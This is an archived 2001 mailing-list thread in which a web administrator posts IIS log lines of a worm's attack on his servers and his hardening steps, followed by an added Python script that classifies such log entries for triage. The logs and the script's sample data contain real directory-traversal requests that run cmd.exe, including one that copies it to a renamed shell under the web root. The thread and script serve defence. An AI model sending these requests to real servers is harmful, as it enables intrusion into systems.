Archive of:
CF-Talk
Cold Fusion - Technical
Subject: Re: Log files of a web attack.
From: Jon Hall
Posted: Wednesday 09 May 2001
A little more info is starting to go around. This attack is a scripted attack from a worm that infects Solaris machines, which then attack up to 2000 IIS servers before putting up the f*ck usa pages on the Solaris machine. Mostly harmless, but you gotta admire the mind that came up with that. Script kiddies who are too lazy to run their own scripts! ;-)
I am getting more and more annoyed at Microsoft's poor excuse for a web server every day though.
jon

----- Original Message -----
From: <moonerent@yahoo.com>
To: "CF-Talk" <cf-talk@houseoffusion.com>
Sent: Tuesday, May 08, 2001 9:52 PM
Subject: OT: Log files of a web attack.
> Hi,
>
> I thought the group would like to see the techniques of a recent attack on our web servers. They've been doing this a couple of times a day for a week. UUNet (their ISP) is slow in stopping them.
>
> To secure IIS we've removed all extensions except cfm. We've taken out all the IIS folders and files like /mdac, /scripts and /printers. We've secured the cfide folder with passwords, including locking out the user after a couple of failed attempts, and we log the failures. Lastly, we've removed all permissions from cmd.exe.
>
> This has kept them out to date. Any additional ideas are welcomed. None of this is top secret info; the hackers already know it, but do you, and are you protected?
>
> HTH,
>
> Rick Moon
>
> 2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/..Ã%pc../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:45 209.183.204.251 - myIP 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:36:56 209.183.204.251 - myIP 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET /scripts/..Ã%8s../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET /scripts/..Ã.../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:04 209.183.204.251 - myIP 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-08 12:38:17 209.183.204.251 - myIP 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 01:26:07 200.245.48.155 - myIP GET /scripts..\../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:57:58 200.230.112.153 - myIP 80 GET /iisadmpwd/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:00 200.230.112.153 - myIP 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:14 200.230.112.153 - myIP 80 GET /cgi-bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:22 200.230.112.153 - myIP 80 GET /samples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:29 200.230.112.153 - myIP 80 GET /_vti_cnf/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:36 200.230.112.153 - myIP 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-03 17:58:42 200.230.112.153 - myIP 80 GET /adsamples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:43:02 200.245.48.132 - myIP 80 HEAD /aaa - 404 -
> 2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /carbo.dll - 404 -
> 2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /cgi-win/uploader.exe - 404 -
> 2001-05-05 02:43:06 200.245.48.132 - myIP 80 HEAD /search97.vts - 404 -
> 2001-05-05 02:43:08 200.245.48.132 - myIP 80 HEAD /_vti_inf.html - 200 -
> 2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd - 404 -
> 2001-05-05 02:43:12 200.245.48.132 - myIP 80 HEAD /_vti_pvt/users.pwd - 404 -
> 2001-05-05 02:43:13 200.245.48.132 - myIP 80 HEAD /_vti_pvt/authors.pwd - 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /....../autoexec.bat - 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /..../config.sys - 404 -
> 2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr - 404 -
> 2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp.htr - 404 -
> 2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2.htr - 404 -
> 2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2b.htr - 404 -
> 2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp3.htr - 404 -
> 2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4.htr - 404 -
> 2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4b.htr - 404 -
> 2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot.htr - 404 -
> 2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot3.htr - 404 -
> 2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /cgi-bin/visadmin.exe - 404 -
> 2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/no-such-file.pl - 404 -
> 2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/fpcount.exe - 404 -
> 2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/rguest.exe - 404 -
> 2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/wguest.exe - 404 -
> 2001-05-05 02:43:32 200.245.48.132 - myIP 80 HEAD /default.asp::$DATA - 404 -
> 2001-05-05 02:43:35 200.245.48.132 - myIP 80 HEAD /msadc/Samples/SELECTOR/showcode.asp |-|0|404_Object_Not_Found 404 -
> 2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /adsamples/config/site.csc - 404 -
> 2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /scripts/iisadmin/ism.dll http/dir 404 -
> 2001-05-05 02:43:37 200.245.48.132 - myIP 80 HEAD /AdvWorks/equipment/catalog_type.asp |-|0|404_Object_Not_Found 404 -
> 2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/openfile.cfm - 401 -
> 2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/ExprCalc.cfm - 401 -
> 2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/displayopenedfile.cfm - 401 -
> 2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/sendmail.cfm - 401 -
> 2001-05-05 02:43:45 200.245.48.132 - myIP 80 HEAD /GetFile.cfm - 200 -
> 2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/get32.exe - 404 -
> 2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/alibaba.pl - 404 -
> 2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /cgi-bin/tst.bat - 404 -
> 2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /default.asp - 404 -
> 2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /winnt/repair/sam._ - 404 -
> 2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /cgi-bin/imagemap.exe - 404 -
> 2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90)
> 2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /cgi-bin/cgitest.exe - 404 -
> 2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /config.sys - 404 -
> 2001-05-05 02:43:55 200.245.48.132 - myIP 80 HEAD /scripts/webbbs.exe - 404 -
> 2001-05-05 02:43:57 200.245.48.132 - myIP 80 HEAD /cgi-bin/input.bat - 404 -
> 2001-05-05 02:44:03 200.245.48.132 - myIP 80 HEAD /test.idq - 404 -
> 2001-05-05 02:44:04 200.245.48.132 - myIP 80 HEAD /test.ida - 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /scripts/counter.exe - 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /common/browser.inc - 404 -
> 2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/echo.bat - 404 -
> 2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/hello.bat - 404 -
> 2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /rightfax/fuwww.dll - 404 -
> 2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /scripts/cgimail.exe - 404 -
> 2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /officescan/cgi/jdkRqNotify.exe - 404 -
> 2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /ows-bin/perlidlc.bat &dir 404 -
> 2001-05-05 02:44:13 200.245.48.132 - myIP 80 HEAD /cgi-bin/windmail.exe - 404 -
> 2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /null.htw CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 404 -
> 2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /_vti_bin/_vti_aut/dvwssr.dll - 404 -
> 2001-05-05 02:44:17 200.245.48.132 - myIP 80 HEAD /scripts/wa.exe - 404 -
> 2001-05-05 02:45:22 200.64.239.78 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
> 2001-05-05 02:46:23 200.53.250.14 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
> 2001-05-05 02:48:53 200.245.48.141 - myIP 80 HEAD /index.cfm - 200 -
> 2001-05-05 02:49:25 200.245.48.141 - myIP 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:36 200.245.48.141 - myIP 80 GET /scripts/..Ã%8s../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:48 200.245.48.141 - myIP 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:49:53 200.245.48.141 - myIP 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:50:05 200.245.48.141 - myIP 80 GET /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:50:11 200.245.48.141 - myIP 80 GET /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir 404 -
> 2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/newdsn.exe - 404 -
> 2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/getdrvs.exe - 404 -
> 2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/administrators.pwd - 404 -
> 2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.dll - 404 -
> 2001-05-05 02:43:16 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.exe - 404 -
> 2001-05-05 02:43:17 200.245.48.132 - myIP HEAD /samples/search/queryhit.htm - 404 -
> 2001-05-05 02:43:33 200.245.48.132 - myIP HEAD /iissamples/exair/howitworks/codebrws.asp - 404 -
> 2001-05-05 02:43:33 200.245.48.132 - myIP HEAD /iissamples/sdk/asp/docs/codebrws.asp - 404 -
> 2001-05-05 02:43:56 200.245.48.132 - myIP HEAD /cgi-bin/test.bat - 404 -
> 2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /cgi-bin/input2.bat - 404 -
> 2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /ssi/envout.bat - 404 -
> 2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /msadc/msadcs.dll - 404 -
> 2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /cgi-bin/htimage.exe - 404 -
> 2001-05-05 02:44:02 200.245.48.132 - myIP HEAD /test.idc - 404 -
> 2001-05-05 02:44:05 200.245.48.132 - myIP HEAD /test.idw - 404 -
> 2001-05-05 02:44:11 200.245.48.132 - myIP HEAD /default.asp - 404 -
>
> This is the really bad one.
>
> 2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe
> 2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET /scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot
>
> end.
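The entries Rick quoted are what a traversal scanner leaves in an IIS W3C log: cmd.exe requested through /scripts and /msadc with plain, backslash and overlong-UTF-8 "..", a sweep of sample and admin handlers (iisadmpwd, _vti_pvt, .htr, .ida, ::$DATA), and finally cmd.exe copied to sensepost.exe inside the scripts directory so it can be invoked on its own. The following is an added example, not code from the thread or from CF-Talk, of a small Python triage script that parses lines in that format, tags the patterns and ranks each source address by the worst outcome. The sample log is constructed in the post's format with documentation addresses; the two sensepost.exe lines are given a 200 status that the post did not show, purely to exercise the worst branch. The probe-path list, tag names and severity labels are the example's own choices.

```python
"""Triage IIS W3C extended log lines for the traversal and cmd.exe probes seen
in the thread.  Added example; not code from the post or from CF-Talk.  The
sample lines are constructed in the post's format with documentation addresses."""
import re
from collections import defaultdict
from urllib.parse import unquote

METHODS = {"GET", "HEAD", "POST", "PUT", "OPTIONS", "PROPFIND", "TRACE"}
# Directories and handlers the scanner probed; Rick removed most of them from
# his box, so any 200 under these deserves a look.  (Example's own list.)
PROBE_PATHS = ("/scripts/", "/msadc/", "/iisadmpwd/", "/_vti_", "/cgi-bin/",
               "/samples/", "/iissamples/", "/adsamples/", "/cfdocs/", "/winnt/")
PROBE_EXTENSIONS = (".htr", ".ida", ".idq", ".idc", ".idw", ".pwd", ".htw")
RANK = ["OK", "RECON", "EXPOSED", "ATTEMPT-BLOCKED", "ATTEMPT", "HIGH", "CRITICAL"]

def parse_iis_line(line):
    """Split one W3C line.  Some entries in the post omit s-port, so fields are
    located relative to the method token rather than by fixed position."""
    parts = line.split()
    if not parts or parts[0].startswith("#"):
        return None
    idx = next((i for i, p in enumerate(parts) if p in METHODS), None)
    if idx is None or idx < 3:
        return None
    def field(k):
        return parts[idx + k] if len(parts) > idx + k else "-"
    status = field(3)
    return {"date": parts[0], "time": parts[1], "client": parts[2],
            "method": parts[idx], "stem": field(1), "query": field(2),
            "status": int(status) if status.isdigit() else None}

def normalize(uri):
    """Decode twice (IIS decoded once before logging; attackers double-encode),
    fold backslashes to slashes and lower-case.  Invalid escapes like %pc stay."""
    for _ in range(2):
        uri = unquote(uri)
    return uri.replace("\\", "/").lower()

def classify(rec):
    """Tag one record with the attack patterns it matches."""
    tags = set()
    path, query = normalize(rec["stem"]), normalize(rec["query"])
    if any(seg.startswith("..") for seg in path.split("/")):
        tags.add("traversal")
    # A non-ASCII byte in the logged stem, or a raw %c0/%c1/%e0/%f0 lead byte,
    # is the overlong-UTF-8 trick used to smuggle '/' or '\' past the '..' check.
    if any(ord(c) > 127 for c in rec["stem"]) or re.search(r"%[c-f][0-9a-f]%", rec["stem"], re.I):
        tags.add("malformed-utf8")
    if path.endswith("/cmd.exe"):
        tags.add("cmd.exe")
    if query.startswith("/c"):                      # cmd.exe /c <command>
        tags.add("command")
        if "copy" in query and "cmd.exe" in query:
            tags.add("shell-copy")                  # staging a renamed shell under the web root
        if path.endswith(".exe") and not path.endswith("/cmd.exe"):
            tags.add("renamed-shell")               # the staged copy being invoked
    if path.startswith(PROBE_PATHS) or path.endswith(PROBE_EXTENSIONS) or "::$data" in path:
        tags.add("probe")
    return tags

def severity(rec, tags):
    """A 200 on a command request means the server ran it; a 404 was blocked."""
    ok = rec["status"] == 200
    if "command" in tags and ok:
        return "CRITICAL"
    if "shell-copy" in tags or "renamed-shell" in tags:
        return "HIGH"        # even if this request failed, check the scripts dir on disk
    if tags & {"traversal", "cmd.exe", "command", "malformed-utf8"}:
        return "ATTEMPT-BLOCKED" if rec["status"] == 404 else "ATTEMPT"
    if "probe" in tags:
        return "EXPOSED" if ok else "RECON"
    return "OK"

def triage(log_text):
    """Return per-line findings and a per-client summary of the worst severity."""
    findings = []
    per_ip = defaultdict(lambda: {"requests": 0, "worst": "OK", "tags": set()})
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        sev = severity(rec, tags)
        findings.append((sev, rec["client"], rec["method"], rec["stem"], rec["query"]))
        entry = per_ip[rec["client"]]
        entry["requests"] += 1
        entry["tags"] |= tags
        if RANK.index(sev) > RANK.index(entry["worst"]):
            entry["worst"] = sev
    return findings, dict(per_ip)

# Constructed sample (hypothetical addresses).  The last two lines carry a 200
# the post did not show, to illustrate a successful copy of cmd.exe.
SAMPLE_LOG = r"""
2001-05-08 12:36:44 192.0.2.10 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:44 192.0.2.10 - myIP 80 GET /scripts/..Ã%pc../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:45 192.0.2.10 - myIP 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 01:26:07 192.0.2.10 - myIP GET /scripts..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:08 198.51.100.7 - myIP 80 HEAD /_vti_inf.html - 200 -
2001-05-05 02:43:10 198.51.100.7 - myIP 80 HEAD /_vti_pvt/service.pwd - 404 -
2001-05-05 02:43:20 198.51.100.7 - myIP HEAD /iisadmpwd/achg.htr - 404 -
2001-05-05 02:43:32 198.51.100.7 - myIP 80 HEAD /default.asp::$DATA - 404 -
2001-05-05 02:45:22 198.51.100.9 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-01 08:23:09 203.0.113.5 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe 200 -
2001-05-01 08:23:11 203.0.113.5 - myIP 80 GET /scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot 200 -
"""

if __name__ == "__main__":
    findings, per_ip = triage(SAMPLE_LOG)
    for f in findings:
        print("%-15s %-13s %-4s %s %s" % f)
    for ip, e in sorted(per_ip.items(), key=lambda kv: -RANK.index(kv[1]["worst"])):
        print(ip, e["worst"], e["requests"], "requests", sorted(e["tags"]))
```

The ranking encodes the point of Rick's post: every 404 on a cmd.exe request is a blocked attempt and can be counted and reported to the ISP, but a 200 on a /c+copy line means a renamed shell now sits under the web root and will outlive any later patch or permission change, so the scripts directory has to be checked on disk and not only in the log. Note that IIS logs the stem after its own decoding, which is why the overlong sequences appear as stray high bytes rather than as %c0%af; the detector looks for both forms.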